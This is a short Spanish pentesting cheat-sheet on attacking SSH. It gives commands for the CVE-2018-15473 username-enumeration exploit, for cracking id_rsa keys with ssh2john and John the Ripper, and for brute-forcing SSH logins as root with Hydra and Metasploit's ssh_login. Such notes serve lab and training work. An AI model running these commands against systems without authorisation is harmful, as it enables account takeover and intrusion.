22 SSH

Enumeracion con metasploit #

search type:auxiliary name:ssh

Enumerar SSH (V2.3-7.7) #

exploit SSH-Username-Enumeration CVE-2018-15473

#1 clonar repositorio y luego:
pip3 install -r requirements.txt

#2 Lanzar exploit
./CVE-2018-15473.py <ip> -u <username_dictionary>

Fuerza bruta id_rsa hash SSH #

Teniendo el fichero id_rsa, podemos intentar crackearlo por fuerza bruta. Para ello primero debemos pasarlo a un formato que entienda john the ripper:

ssh2john id_rsa > hash.txt

Con el hash.txt obtenido:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Fuerza bruta servicio SSH #

Hydra #

Si la “l” o “p” son minúsculas, le estamos indicando que utilice literalmente dicho usuario o contraseña. Si es mayúscula, lo utilizaremos para tirar de un diccionario.

hydra ssh://127.0.0.1 ssh -s 22 -l root -P pass.txt -f -vV 

# con -t 64 indicamos los hilos
hydra -t 64 ssh://127.0.0.1 ssh -s 22 -l root -P pass.txt

Metasploit #

# search ssh_login, utilizaremos auxiliary/scanner/ssh/ssh_login
Completamos los datos y "run"
# METASPLOIT es un poco mas lento que hydra.

Reenvio de puertos ssh #

También llamado local port forwarding ![[Local port forwarding]]